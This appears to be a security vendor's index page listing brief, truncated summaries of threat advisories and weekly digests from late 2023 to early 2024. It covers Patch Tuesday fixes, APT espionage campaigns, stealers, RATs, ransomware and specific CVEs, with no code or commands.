Microsoft’s January 2024 Patch Tuesday Addresses 49 Vulnerabilities

Summary: Microsofts January 2024 Patch Tuesday addressed 49 vulnerabilities, including two critical ones, covering various products. Notably, a high-risk Kerberos security flaw CVE-2024-20674 and a network-adjacent Hyper-V vulnerability CVE-2024-20700 were patched, urging prompt updates to mitiga...

Unveiling the Sea Turtle Cyber Espionage Campaign

Summary: Sea Turtle, a Turkey-based Advanced Persistent Threat APT actor, has been active since 2017. The group has primarily targeted European and Middle Eastern organizations, focusing on information theft and DNS hijacking to compromise repositories with valuable and sensitive data. In a recen...

Anonymous Arabic Hacktivist Group Orchestrating Silver RAT

Summary: Silver RAT, a Windows-based RAT written in C and developed by a group known as "Anonymous Arabic," exhibits advanced capabilities, including antivirus evasion and ransomware encryption. Despite facing bans, the threat actors dynamic activities persist, featuring the sharing of cracked...

CISA Known Exploited Vulnerability Catalog December 2023

For a detailed CISAs KEV Catalog, download the pdf file here Summary The Known Exploited Vulnerability KEV catalog, maintained by CISA, is the authoritative source of vulnerabilities that have been exploited in the wild. It is recommended that all organizations review and monitor the KEV catalog,...

Attacks, Vulnerabilities and Actors 1 January to 7 January 2024

For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of twelve executed attacks, two instances of adversary activity, and three exploited...

Ivanti Addresses Critical Vulnerability in Endpoint Manager

Summary: Ivanti addressed a critical vulnerability CVE-2023-39336 in its Endpoint Management software, ensuring secure usage for its 40,000 worldwide customers. The flaw, resolved in version 2022 Service Update 5, posed a risk of pre-authenticated sql injection and possibly Remote Code Injection ...

Decoding UAC-0050’s Cyber Espionage Playbook

Summary: UAC-0050, a threat actor focused on Ukraine, is using new tactics to spread the Remcos RAT. In their latest move, UAC-0050 shows advanced adaptability by cleverly avoiding detection through a hidden data transfer method and outsmarting EDR systems. Threat Level - Amber | Attack Report Fo...

Surging JavaScript Threats Steal Your Secrets

Summary: The threat actors utilize malicious JavaScript samples, taking advantage of popular survey sites, low-quality hosting, and web chat APIs to steal sensitive information. They create chatbots registered under notable figures, like an Australian footballer, in specific campaigns...

SMTP Smuggling Enabling Spoofed Emails to Evade Authentication Protocols

Summary: A new email spoofing technique called "SMTP Smuggling" lets attackers send emails from fake addresses, bypassing security checks. This trick works by abusing how different servers handle line endings in email messages. The attack could affect millions of email users, so updating your...

Malware Leveraging Google OAuth for Persistent Account Access

Summary: Information-stealing malware is actively exploiting an undisclosed Google OAuth endpoint called MultiLogin. This technique was initially disclosed by a threat actor named PRISMA on their Telegram channel and has subsequently been integrated into various malware-as-a-service MaaS stealer...

Attacks, Vulnerabilities and Actors 25 December to 31 December 2023

For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of eight executed attacks, four instances of adversary activity, and five exploited...

Nim Backdoor Masquerades as Nepal Government Security

Summary: Attackers employed malicious Microsoft Word documents disguised as official communications from the Nepali government. These documents aimed to trick victims into downloading and executing a backdoor program written in the Nim programming language. As Nim is an uncommon language, it pose...

Unveiling Novel Malware Waves by APT28

Summary: A recent phishing campaign attributed to the Russia-linked APT28 group has been identified targeting Ukrainian government entities and Polish organizations with email messages urging recipients to click on a link to view a document. The goal is to deploy previously undocumented malware,...

Zero-Day Authentication Bypass Exploit in Apache OFBiz

Summary: CVE-2023-51467 is a critical authentication bypass vulnerability in Apache OFBiz. Exploitation of this vulnerability could result in bypass authentication to achieve a simple Server-Side Request Forgery SSRF or arbitrary code execution. Users are advised to update to Apache OFBiz version...

Kimsuky Group’s Intriguing Exploits with AppleSeed Malware

Summary: The Kimsuky group has been actively utilizing weaponized LNK files to deploy the AppleSeed malware. While the group typically relies on spear-phishing attacks for initial access, their recent campaigns have prominently featured the use of shortcut-type malware in LNK file format. AppleSe...

Terrapin Attack Downgrading the Fortresses of SSH

Summary: The Terrapin attack, a cryptographic exploit targeting the widely adopted SSH protocol, poses a threat to the security of over 15 million servers dispersed across the Internet. This vulnerability enables attackers to compromise the security of established connections by truncating the...

Barracuda Fixes ACE Zero-day Vulnerability Exploited by Attackers

Summary: The Barracuda Email Security Gateway vulnerability CVE-2023-7102 allows remote attackers to execute arbitrary commands, posing a substantial threat to the security and functionality of affected systems. Exploitation by threat actors has led to the deployment of new malware variants,...

UAC-0099 Utilizes WinRAR Exploit to Deploy LONEPAGE Malware

Summary: UAC-0099, a threat actor, has been involved in persistent attacks targeting Ukraine. These attacks leverage a critical vulnerability in WinRAR to deploy a malware strain known as LONEPAGE. Notably, the threat actor focuses on Ukrainian employees working for organizations outside of...

Cloud Atlas Exploits Six-Year-Old Flaw to Target Russian Companies

Summary: The threat actor Cloud Atlas has been identified in spear-phishing attacks targeting Russian enterprises. The modus operandi involves a phishing message in the initial stage, containing a lure document that exploits CVE-2017-11882, a memory corruption vulnerability in Microsoft Offices...

Operation RusticWeb: Coordinated Strikes on Indian Government

Summary: Since October 2023, an orchestrated phishing campaign named Operation RusticWeb has been systematically targeting the Indian government and defense sector, deploying Rust-based malware for sophisticated intelligence gathering. Threat Level - Amber | Attack Report For a detailed threat...

Attacks, Vulnerabilities and Actors 18 December to 24 December 2023

For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of 15 executed attacks, 4 instances of adversary activity, and 7 exploited vulnerabilities,...

MetaStealer a $125 Ticket to Digital Chaos

Summary: MetaStealer, a nefarious information-stealing malware, initially surfaced in discreet online marketplaces with a pricing structure of USD 125 per month or USD 1000 for an unlimited subscription, subsequently becoming entangled in malvertising campaigns. Threat Level - Red | Attack Report...

Bandook a 2007 Legacy Still Thriving in the Threat Landscape

Summary: The Bandook malware is a persistent remote access trojan RAT that surfaced in 2007. Programmed in Delphi and C++, it has evolved through various iterations over the years and has historical associations with Dark Caracal. It featured prominently in a campaign dubbed ‘Operation Manul’...

Zero-Click Outlook RCE Exploitation Chain in Windows

Summary: Two vulnerabilities CVE-2023-35384 and CVE-2023-36710 in Microsoft Windows can be chained to achieve remote code execution RCE on vulnerable Outlook clients. Attackers can exploit these flaws by sending a crafted email with a custom notification sound file to trigger the download of a...

Muddywater Utilizes Custom Tools to Target Telecom Companies

Summary: Iranian espionage group Muddywater,targeted telecommunications companies in Egypt, Sudan, and Tanzania in November 2023. The attackers employed a diverse set of tools for this activity, including leveraging the MuddyC2Go infrastructure. Additionally, they utilized the SimpleHelp remote...

Google’s Battle Against Zero-Day Vulnerability Continues

Summary: Google has recently implemented a security enhancement to address a high-severity zero-day vulnerability, identified as CVE-2023-7024, that can lead to program crashes or enable arbitrary code execution. Threat Level - Red | Vulnerability Report For a detailed threat advisory, download t...

Mallox Ransomware A Resurgent Threat Exploiting MS-SQL Flaws

Summary: Mallox is a resilient Ransomware-as-a-Service RaaS threat, utilizing tactics like exploiting MS-SQL vulnerabilities and employing brute force attacks. Operating with a prolonged presence, Malloxs recent variant, "Mallox.Resurrection," exhibits consistent functionalities, emphasizing the...

Novel Go-Based Malware Unleashes Coordinated Strikes on macOS and Windows

Summary: A recently identified threat known as JaskaGO has surfaced as a new cross-platform information stealer malware. This malware is designed to target and compromise systems running both Windows and Apple macOS operating systems. Threat Level - Red | Attack Report For a detailed threat...

PikaBot Malware Unleashes Threat via Malvertising

Summary: PikaBot, a recently identified malware family, has become a prominent threat in malvertising campaigns, particularly through search engine ads. Associated with the TA577 threat actor and linked to ransomware distribution, PikaBot employs advanced tactics, such as decoy websites and...

The Kuiper Ransomware Surge and Its Dark Origins

Summary: In a predominantly Russian Dark Web forum, a sophisticated ransomware-as-a-service RaaS project named "KUIPER" was introduced. The Kuiper ransomware, developed in Golang, is compatible with Windows, Linux, and OSX systems, and is associated with a suspected intrusion at a government...

OilRig Group Unleashes Three New Malware Strains

Summary: The Iranian state-sponsored threat actor, commonly referred to as OilRig, implemented three distinct downloader malware variants throughout the year 2022. The primary objective was to sustain persistent access to targeted organizations located in Israel. OilRig demonstrated active...

Play Ransomware A Global Threat Impacting Businesses

Summary: The Play ransomware group, active since June 2022, employs a double-extortion model, impacting businesses globally. Utilizing legitimate tools for malicious activities, the group has affected approximately 300 entities. Threat Level - Red | Attack Report For a detailed threat advisory,...

Attacks, Vulnerabilities and Actors 11 December to 17 December 2023

For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of eleven executed attacks, six instances of adversary activity, and five exploited...

Gaza Cybergang’s Pierogi++ Upgrade Takes Center Stage

Summary: The Gaza Cybergang, a sophisticated threat actor, has recently intensified its attacks by deploying an advanced version of the Pierogi backdoor malware. This group focuses its cyber operations primarily on Palestinian entities and Israel, with a historical record of targeting entities...

NKAbuse: A New Multiplatform Threat Exploiting the Blockchain Protocol

Summary: A novel malware called NKAbuse stands out as a new, Go-based, multi-platform threat. What makes this malware distinctive is its pioneering use of the peer-to-peer network connectivity protocol NKN New Kind of Network technology for data exchange. This utilization of NKN technology makes...

Rhadamanthys Stealer Version 0.5.0 Upgrade Overview

Summary: Rhadamanthys, the information-stealing malware, has taken a significant leap with its v0.5.0 upgrade, introducing expanded stealing features, raw syscalls, and an enhanced loader design, showcasing advanced evasion techniques. Its modular architecture allows for continuous updates,...

Unveiling GambleForce: A SQL Injection Gang

Summary: A recently identified threat actor, GambleForce, has been linked to a series of SQL injection attacks targeting companies primarily in the Asia-Pacific region. GambleForce employs a combination of basic yet highly effective techniques, including SQL injections and exploiting...

Russian SVR Exploits Critical TeamCity Vulnerability Globally

Summary: A critical vulnerability CVE-2023-45247 in JetBrains TeamCity is actively exploited by Russias SVR cyber actors APT 29, allowing full server compromise. The targeted software widely used by developers poses a significant threat, enabling access to sensitive information and potential...

TA4557 Targets Recruiters by Delivering Malware Disguised as Job Applicant

Summary: Threat actor TA4557 has been focusing on recruiters by posing as job applicants to distribute malware. While this approach is not unprecedented, there have been notable shifts in both technique and attack vectors compared to their previous methods. The attackers have demonstrated an...

Critical Remote Code Execution Flaw Uncovered in Apache Struts 2

Summary: A significant vulnerability has been identified in the Apache Struts 2 open-source web application framework, labeled CVE-2023-50164. This flaw poses a severe risk of remote code execution and unauthorized path traversal. Threat Level - Red | Vulnerability Report For a detailed threat...

Microsoft’s December 2023 Patch Tuesday Addresses One Zero-day Vulnerability

Summary: In the December Patch Tuesday release, Microsoft addressed a total of 42 CVEs, including one zero-day vulnerability. Within this range of vulnerabilities, the security update covered the typical spectrum of issues, including RCE flaws, concerns related to privilege escalation, spoofing,...

Apple’s Timely Response to Actively Exploited Zero-Days

Summary: Apple has released crucial software updates to address two actively exploited security vulnerabilities identified as CVE-2023-42916 and CVE-2023-42917. These vulnerabilities affect the WebKit browser engine on Apple devices such as iPhone, iPad, and Mac, potentially exposing sensitive...

Adversaries Leverage Social Media to Disseminate New Python-Based Stealer

Summary: A recently identified malicious campaign involves the use of WinRAR archive files with minimal detection to execute a multi-stage attack. The payload, known as Editbot, is a newly discovered Python-based stealer. Editbot is specifically designed to extract process information and data...

The Unseen Thread Linking Sandman APT and KEYPLUG Backdoor

Summary: The Sandman Advanced Persistent Threat APT is closely linked to suspected threat clusters originating from China, specifically identified as Storm-0866, also known as Red Dev 40. Within the same victim environments, the Sandmans Lua-based malware, LuaDream, and the KEYPLUG backdoor have...

Lazarus’s Operation Blacksmith Deploys Novel Dlang RATs

Summary: The Lazarus Group, a North Korea-linked threat actor, has been identified in a new global campaign called "Operation Blacksmith." In this campaign, the group opportunistically exploits the security vulnerability CVE-2021-44228 in Log4j to deploy previously undocumented RATs on compromise...

Attacks, Vulnerabilities and Actors 4 December to 10 December 2023

For a detailed threat digest, download the pdf file here Summary HiveForce Labs recently made several significant discoveries in the realm of cybersecurity threats. In the past week alone, a total of eleven attacks were executed, eleven vulnerabilities were uncovered, and four active adversaries...

Decoding MrAnon Stealer’s Plot through Deceptive Emails

Summary: A phishing email campaign employs misleading booking details to lure victims, aiming to deploy a Python-based information stealer known as MrAnon Stealer. This malicious software is designed to pilfer victims credentials, system details, browser sessions, and cryptocurrency extensions...

APT28’s Tactical Exploitation of Critical Vulnerabilities

Summary: The APT28 adversary, originating from Russia, has garnered notoriety through sophisticated phishing activities. By exploiting patched vulnerabilities as an initial access point, APT28 conducts extensive campaigns targeting diverse sectors, including government, aerospace, education,...

New Linux Krasue RAT Targeting Telecom Companies in Thailand

Summary: Krasue, a new Linux Remote Access Trojan, targets Thai organizations, primarily in telecommunications, using embedded rootkits and a unique RTSP-based communication tactic. Believed to be connected to XorDdos, it evades detection through various stealth measures, emphasizing the importan...

Star Blizzard Continues to Refine Their Tradecraft for Evasion and Stealth

Summary: The Russia-based threat actor, Star Blizzard, continues to utilize spear-phishing attacks successfully, targeting organizations and individuals across various geographical regions for information-gathering activities. Star Blizzard has improved its detection evasion capabilities since 20...